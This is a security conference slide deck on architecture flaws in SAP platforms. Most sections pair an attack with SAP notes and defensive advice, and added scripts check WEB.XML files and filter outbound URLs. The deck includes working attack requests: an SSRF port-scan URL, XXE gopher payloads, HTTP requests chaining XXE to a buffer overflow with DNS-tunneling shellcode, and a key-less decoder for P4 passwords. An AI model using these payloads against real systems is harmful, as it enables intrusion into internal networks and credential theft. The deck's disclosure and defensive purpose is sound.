Invest in security to secure investments
Architecture vulnerabilities in SAP platforms: History and future trends
Alexander Polyakov, CTO, ERPScan
Dmitry Evdokimov, Principal Researcher, ERPScan
About ERPScan
• The only 360-degree SAP security solution: ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team: 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
SAP
• The most popular business application
• More than 185000 customers
• 74% of Forbes 500
Agenda
• Intro
  – The history of SAP security
  – Trends
  – Common SAP issues
• Architecture problems and uncommon issues
• Advice for developers and future trends
• Conclusion
3 areas of SAP security

2010: Application platform security
  Prevents unauthorized access by both insiders and remote attackers
  Solution: Vulnerability assessment and monitoring

2008: ABAP code security
  Prevents attacks or mistakes made by developers
  Solution: Code audit

2002: Business logic security (SOD)
  Prevents attacks or mistakes made
  Solution: GRC
Talks about SAP security

[Chart: number of talks about SAP security per year, 2006–2012]

Most popular:
• BlackHat
• HITB
• Troopers
• RSA
• Source
• DeepSec
• etc.
SAP Security notes

[Chart: number of SAP Security notes per year, 2001–2012]

By October 2012, more than 2500 notes
Business risks

Espionage
• Stealing financial information
• Stealing corporate secrets
• Stealing suppliers and customers list
• Stealing HR data

Sabotage
• Denial of service
• Modification of financial reports
• Access to technology network (SCADA) by trust relations

Fraud
• False transactions
• Modification of master data
• Etc.
SAP vulnerabilities by type

[Chart: number of vulnerabilities per type (0–350); the categories are listed below]
1 - Directory traversal
2 - XSS/Unauthorised modification of
3 - Missing auth check
4 - Information disclosure
5 - Unauthorized usage of application
6 - Hard-coded credentials
7 - Code injection vulnerability
8 - Verb tampering
9 - Remote code execution
10 - Denial of service
11 - BOF
12 - SQL injection

Stats from:
• 1Q 2012
• 1Q 2010
• 4Q 2009

But what about the other 20%?
Architecture and unusual issues

Authentication bypass
  1. Verb tampering
  2. Invoker servlet
Encryption
  3. Storage – SAP GUI
  4. Authentication – P4
  5. Transfer – RFC, DIAG
SSRF
  6. Port scan
  7. Command execution
  8. Security bypass
Authentication
ex1. Invoker servlet: Description
• Rapidly calls servlets by their class name
• Published by SAP in their security guides
• Possible to call any servlet from an application
• Even if it is not declared in WEB.XML

Can be used for authentication bypass
ex1. Invoker servlet: Details

    <servlet>
      <servlet-name>CriticalAction</servlet-name>
      <servlet-class>com.sap.admin.Critical.Action</servlet-class>
    </servlet>
    <servlet-mapping>
      <servlet-name>CriticalAction</servlet-name>
      <url-pattern>/admin/critical</url-pattern>
    </servlet-mapping>
    <security-constraint>
      <web-resource-collection>
        <web-resource-name>Restrictedaccess</web-resource-name>
        <url-pattern>/admin/*</url-pattern>
        <http-method>GET</http-method>
      </web-resource-collection>
      <auth-constraint>
        <role-name>admin</role-name>
      </auth-constraint>
    </security-constraint>

What if we call /servlet/com.sap.admin.Critical.Action?
ex1. Invoker servlet: Prevention

For users:
• Update to the latest patch: SAP notes 1467771, 1445998
• "EnableInvokerServletGlobally" must be "false"
• Check all WEB.XML files
  - with the free ERPScan WEBXML checker
  - manually

For developers:
• Follow the "security by default" practice
2. Verb tampering
ex2. Verb tampering

    <security-constraint>
      <web-resource-collection>
        <web-resource-name>Restrictedaccess</web-resource-name>
        <url-pattern>/admin/*</url-pattern>
        <http-method>GET</http-method>
      </web-resource-collection>
      <auth-constraint>
        <role-name>admin</role-name>
      </auth-constraint>
    </security-constraint>

What if we use HEAD instead of GET?
ex2. Verb tampering: Details
• CTC: an interface for managing the J2EE engine
• Can be accessed remotely
• Can run user management actions:
  – Add users
  – Add to groups
  – Run OS commands
  – Start/stop J2EE

Over 40 other components found to be vulnerable
ex2. Verb tampering: More details

If patched, can be bypassed by the Invoker servlet!
ex2. Verb tampering: Prevention

For users:
• Install SAP notes 1503579, 1616259
• Install other SAP notes about verb tampering
• Disable the Invoker servlet
• Disable the applications that are not necessary
• Check all WEB.XML files
  - with the free ERPScan WEBXML checker
  - manually

For developers:
• The issue was known in 2008 and patched in many application servers. Learn from others' mistakes.
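Both descriptor-level issues above (a constraint keyed on a URL pattern that the /servlet/<class> invoker path never matches, and a constraint narrowed to the HTTP methods it lists) can be caught by a static check of WEB.XML. The script below is an added example written for this page, not the ERPScan WEBXML checker, and the descriptor it parses is a constructed one modelled on the slide.

```python
import xml.etree.ElementTree as ET

# Constructed descriptor modelled on the slide (not a real SAP file).
SAMPLE_WEB_XML = """<web-app>
 <servlet><servlet-name>CriticalAction</servlet-name>
  <servlet-class>com.sap.admin.Critical.Action</servlet-class></servlet>
 <servlet-mapping><servlet-name>CriticalAction</servlet-name>
  <url-pattern>/admin/critical</url-pattern></servlet-mapping>
 <security-constraint>
  <web-resource-collection>
   <web-resource-name>Restrictedaccess</web-resource-name>
   <url-pattern>/admin/*</url-pattern>
   <http-method>GET</http-method>
  </web-resource-collection>
  <auth-constraint><role-name>admin</role-name></auth-constraint>
 </security-constraint>
</web-app>"""


def _local(tag):
    """Drop a namespace prefix ({ns}tag -> tag) so namespaced descriptors parse too."""
    return tag.rsplit("}", 1)[-1]


def check_web_xml(xml_text):
    """Return (kind, detail) findings: explicit http-method lists on a
    constraint (verb tampering) and servlet classes reachable as
    /servlet/<class> when no constraint covers that path (invoker servlet)."""
    root = ET.fromstring(xml_text)
    findings, constrained, classes = [], [], []
    for el in root.iter():
        tag = _local(el.tag)
        if tag == "web-resource-collection":
            patterns = [c.text.strip() for c in el if _local(c.tag) == "url-pattern"]
            methods = [c.text.strip().upper() for c in el if _local(c.tag) == "http-method"]
            constrained.extend(patterns)
            # Naming methods limits the constraint to those verbs; anything
            # else (HEAD, POST, ...) reaches the resource unauthenticated.
            if methods:
                findings.append(("verb-tampering", f"{patterns} protected only for {methods}"))
        elif tag == "servlet-class" and el.text:
            classes.append(el.text.strip())
    # A constraint keyed on /admin/* says nothing about /servlet/<class>.
    if not any(p in ("/*", "/servlet/*") for p in constrained):
        for cls in classes:
            findings.append(("invoker-servlet", f"/servlet/{cls} unprotected if invoker enabled"))
    return findings
```

Removing the http-method element and adding a /servlet/* pattern to the constraint (or disabling the invoker servlet globally, as the slide recommends) makes both findings disappear.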
Encryption
Where it can be used
• While authenticating (example 5)
• While transmitting (example 4)
• While storing (example 3)
ex3. SAP GUI encryption
• SAP FrontEnd can save encrypted passwords in shortcuts
• Shortcuts are stored in .sap files
• The password uses a byte-XOR algorithm with a "secret" key
• The key has the same value for every installation of SAP GUI
• Any password can be decrypted

ex3. SAP GUI encryption: Prevention

For users:
• Disable password storage in the GUI

For developers:
• Use at least a random salt depending on the installation
• Do not use XOR in the future
ex4. Insecure password encryption in P4
• P4: a protocol used by the Visual Admin app
• By default, data is transmitted in cleartext
• But the password is encrypted
ex4. Insecure password encryption in P4

Decompiled Java fragment from the slide (decompiler line numbers stripped, wrapped in a method for readability; the method name is added here). The "encryption" is a running XOR seeded with the constant 43690 (0xAAAA) and closed with a check word derived from the constant 21845 (0x5555):

    // data: the password characters to "encrypt"
    static char[] encode(char[] data) {
        char mask = 43690;   // 0xAAAA, identical in every installation
        char check = 21845;  // 0x5555
        char[] result = new char[data.length + 1];

        for (int i = 0; i < data.length; ++i) {
            mask = (char)(mask ^ data[i]);  // running XOR: each word depends only on the previous one
            result[i] = mask;
        }
        result[data.length] = (char)(mask ^ check);  // trailing check word, no secret involved

        return result;
    }
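To make the weakness concrete, here is an added Python port of the P4 routine above next to a key-less inverse (example code written for this page, not SAP's or ERPScan's): because the seed and the check constant are fixed, each output word differs from its predecessor only by one plaintext character, so anyone holding the transmitted words recovers the password without any key.

```python
SEED = 0xAAAA   # 43690 in the decompiled code
CHECK = 0x5555  # 21845 in the decompiled code


def p4_encode(data):
    """Port of the decompiled P4 routine: running XOR seeded with SEED,
    followed by a trailing check word (last mask XOR CHECK)."""
    mask = SEED
    result = []
    for ch in data:
        mask ^= ord(ch)          # each output word depends on the previous one
        result.append(mask)
    result.append(mask ^ CHECK)  # trailing "checksum" word
    return result


def p4_decode(words):
    """Recover the plaintext with no key at all: data[i] = words[i] ^ words[i-1],
    with words[-1] taken as the public constant SEED. The trailing word is
    verified the same way the encoder built it."""
    body, check_word = words[:-1], words[-1]
    prev = SEED
    chars = []
    for w in body:
        chars.append(chr(w ^ prev))
        prev = w
    if (prev ^ CHECK) != check_word:
        raise ValueError("check word mismatch: not a P4-encoded sequence")
    return "".join(chars)
```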
ex4. Insecure password encryption in P4: Prevention

For users:
• Use SSL to secure all the data transmitted over server-server and server-client connections
  http://help.sap.com/saphelp_nwpi71/helpdata/de/14/ef2940cbf2195de10000000a1550b0/content.htm

For developers:
• Use known and approved authentication schemes such as CRAM-MD5 (at least, if it is broken, you will not be the one)
ex5. Password transmitting (DIAG/RFC)
• DIAG is not an encryption protocol; also broken
• RFC encryption: broken in 2007 (XOR)
• Both were already covered many times

For users:
• Use SNC

For developers:
• XOR is BAD
SSRF

SSRF basics
• We send Packet A to Service A
• Service A initiates Packet B to Service B
• The services can be on the same host or on different hosts
• We can manipulate some fields of Packet B within Packet A
• Various SSRF attacks depend on how many fields we can control in Packet B
SSRF at a glance

[Diagram: Packet A enters the corporate network to Service A; Service A sends Packet B into the secure network; the bullet steps are the same as on the previous slide]
What can be done by SSRF?
• Port scanning (example 6)
• Code execution (example 7)
• Security bypass (example 8)

Let's look deeper
ex6. Remote port scan by SSRF
• It is possible to scan the internal network from the Internet
• Authentication is not required
• The SAP NetWeaver J2EE engine's ipcpricing application is vulnerable
  o And at least 3 similar vulnerabilities in other services

    /ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=31337&password=&dispatcher=&targetClient=&view=
ex6. Remote port scan with SSRF: Demo

[Screenshots of the three distinguishable responses: port closed, HTTP port, SAP port]
ex7. Code execution with SSRF
• DilbertMSG web service
• Uses SOAP XML
• For testing purposes
• Shipped with SAP PI < 7.1 by default
• Accessed without authorization
• Patched in SAP Security note 1707494
ex7. XXE tunneling: Gopher URI scheme

What will happen?

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
      <!ELEMENT foo ANY >
      <!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >
    ]>
    <foo>&date;</foo>
ex7. XXE tunneling: Details

Server A (Portal or XI): 192.168.0.1
Server B (ERP, HR, BW etc.): 172.16.0.1

Request to Server A:

    POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
    Host: 192.168.0.1:8000

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
      <!ELEMENT foo ANY >
      <!ENTITY date SYSTEM "gopher://172.16.0.1:3300/AAAAAAAAA" >
    ]>
    <foo>&date;</foo>

[Diagram: Server A opens a connection to Server B on port 3300 (the equivalent of "telnet 172.16.0.1 3300") and sends "AAAAAAAAA"]
ex7. XXE tunneling to buffer overflow
• A buffer overflow vulnerability found by Virtual Forge in the ABAP kernel (fixed in SAP note 1487330)
• Any other vulnerability could serve as the example here
• Hard to exploit because it requires calling an RFC function which calls the kernel function
• But even such a complex attack can be exploited by SSRF
ex7. XXE tunneling to buffer overflow (Step 1)
• We exploit it via WEBRFC
• Can be fixed by SAP notes 1394100, 1536640, 1528822, 1453457
• According to our report, WEBRFC is installed in 40% of NetWeaver ABAP systems, even on the Internet
ex7. XXE tunneling to buffer overflow (Step 2)
• Shellcode size is limited to 255 bytes (NAME parameter)
• As we don't have a direct connection to the Internet from the vulnerable system, we want to use DNS tunneling shellcode to connect back
• But the XML engine saves some XML data in RWX memory
• So we can use an egghunter
• Any shellcode can be uploaded
ex7. XXE tunneling to buffer overflow: Packet B

    POST /sap/bc/soap/rfc?sap-client=000 HTTP/1.1
    Authorization: Basic U1FQKjowMjA3NTk3==
    Host: company.com:80
    User-Agent: ERPSCAN Pentesting tool v 0.2
    Content-Type: text/xml; charset=utf-8
    Cookie: sap-client=000
    Content-Length: 2271

    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
      <SOAP-ENV:Body>
        <m:RSPO_R_SAPGPARAM xmlns:m="urn:sap-com:document:sap:rfc:functions">
          <HEAP_EGG>[egg marker and shellcode: binary, omitted]</HEAP_EGG>
          <NAME>[overflow string: binary, omitted]</NAME>
        </m:RSPO_R_SAPGPARAM>
      </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
ex7. XXE tunneling to buffer overflow (Step 3)

Packet A:

    POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
    Host: sapserver.com:80
    Content-Length: 7730

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
      <!ELEMENT foo ANY >
      <!ENTITY date SYSTEM "gopher://[URL-encoded Packet B]" >
    ]>
    <foo>&date;</foo>

• The next step is to pack Packet B into Packet A
• We need to insert non-printable symbols
• God bless gopher; it supports URL encoding like HTTP
• It will also help us evade IDS systems
ex7. XXE tunneling to buffer overflow: Final step

Server A on the Internet (SAP XI): http://company.com
Server B in the DMZ (SAP ERP): 172.16.0.1, port 8000 (WebRFC service)

Packet A, to Server A:

    POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
    Host: sapserver.com:80

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
      <!ELEMENT foo ANY >
      <!ENTITY date SYSTEM "gopher://[Packet B]" >
    ]>
    <foo>&date;</foo>

Packet B – from Server A to the WebRFC service on port 8000 of Server B
Shellcode service with DNS payload
Packet C – command and control response to the attacker over the DNS protocol, which is allowed for outbound connections

Full control over the internal system through the Internet
ex8. SSRF to security bypass: SAP Gateway
• SAP Gateway: remote management of SAP
• Different attacks are possible, like registering a fake RFC service
• Currently secured by the gw/monitor option:
  0: No monitor commands are accepted
  1: Only monitor commands from the local gateway monitor are accepted
  2: Monitor commands from local and remote monitors are accepted
• With XXE tunneling, we can act like a local monitor, bypassing the restrictions
• For example, we can change SAP Gateway parameters
SAP Gateway server security bypass: Exploit

Message Server is vulnerable as well

    POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
    Host: 172.16.10.63:8001
    Content-Length: 621

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE in [<!ENTITY li SYSTEM "gopher://172.16.0.1:3301/[URL-encoded gateway monitor packet, omitted]">]>
    <dmsg:generate xmlns:dmsg='http://sap.com/fun/dilbert/msg' title='&li;'>1</dmsg:generate>
SSRF: Prevention

For users:
• Disable unnecessary applications (such as XML interfaces)
• Install SAP notes 1548548, 1545883, 1503856, 948851
• Don't rely on firewalls only

For developers:
• Take care not only about input data but also about output data
• Filters must be in every place where it is possible to call remote systems
• Don't trust localhost
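The developer advice above ("filters in every place where it is possible to call remote systems", "don't trust localhost") amounts to validating the destination of every server-initiated request before it is made. The guard below is an added example for this page, not SAP or ERPScan code; the hostname allowlist and the port list are assumptions chosen for the demo, and it deliberately refuses the gopher:// scheme, loopback and private address literals, and the non-standard ports that appear in the slides' Packet B examples.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}   # assumption for the demo


def _blocked_ip(host):
    """True if host is an IP literal in a range an internal service should
    never be asked to reach: loopback ('don't trust localhost'), RFC1918/ULA,
    link-local, multicast, unspecified or reserved."""
    try:
        ip = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return False  # not an IP literal; judged by the hostname allowlist instead
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_unspecified or ip.is_reserved)


def check_outbound_url(url, allowed_hosts):
    """Return (ok, reason). Only an allowlisted hostname over http(s) on an
    allowed port passes; gopher:// and other schemes, raw internal addresses
    and odd ports (31337, 3300, 3301 on the slides) are refused up front."""
    try:
        parts = urlsplit(url)
        host, port = parts.hostname, parts.port   # .port raises on garbage
    except ValueError as exc:
        return False, f"unparseable url: {exc}"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not host:
        return False, "no host"
    if _blocked_ip(host):
        return False, f"internal address {host}"
    if host.lower() not in {h.lower() for h in allowed_hosts}:
        return False, f"host {host} not on allowlist"
    if port is not None and port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    return True, "ok"
```

The allowlisted names must resolve to addresses the operator controls; a check on the resolved address at connection time (not shown) is still needed if DNS for those names is not trusted.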
Advice for SAP

Some other cases
• New technologies = new risks (for developers)
• Double patches (for the remediation team)
• Unusual places for known vulnerabilities (for QA)
Unusual XSS in BAPI (for QA)
• The SAP BAPI transaction fails to sanitize input properly
• Possible to inject JavaScript code
• No cookies, but we can make a link to a fake SMB server
• SAP GUI clients usually use Windows
• Windows credentials will be transferred to the attacker's host
Unusual XSS in BAPI: Prevention

For users:
• Apply SAP note 1569550

For developers:
• XSS is not only about cookie stealing
• In SAP, well-known old things can appear in an unusual way
Double patches (for remediation)

There were some patches that failed to solve the problem in full:

• TH_GREP: patched on Linux but not on Windows
  – It doesn't matter whether it is more or less possible to exploit
  – Patch it carefully
• Portal directory traversal
  – Directory traversal is not about filtering ../
  – The idea is that UNAUTHORIZED ACCESS should be prevented
• Multiple XSS in one script
  – Sometimes there are patches for one parameter but not for the others
  – A very bad situation when information about the patched parameter goes public
New technologies = new risks (for developers)
• SAP is buying many systems
  – Their security testing processes may be different, or there may be no processes at all
• SAP is investing in new technologies and areas
  – Cloud
  – Mobile
  – In-memory
• There can be new security issues in those areas, not known before
Conclusion

It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure.

SAP guides

It's all in your hands:
• Regular security assessments
• ABAP code review
• Monitoring technical security
• Segregation of duties
Future work

Many of the researched issues cannot be disclosed now because of our good relationship with the SAP Security Response Team, whom I would like to thank for their cooperation. However, if you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:
• 2–3 November – HashDays (Switzerland, Lucerne)
• 9 November – POC (Korea, Seoul)
• 20 November – ZeroNights (Russia, Moscow)
• 29 November – DeepSEC (Austria, Vienna)
Thanks to all our crew who helped in this research: Dmitry Chastukhin, Dmitriy Evdokimov, Alexey Sintsov, Alexey Tyurin, Pavel Kuzmin, Evgeny Neyolov, Nikolay Mescherin, Alexander Minozhenko.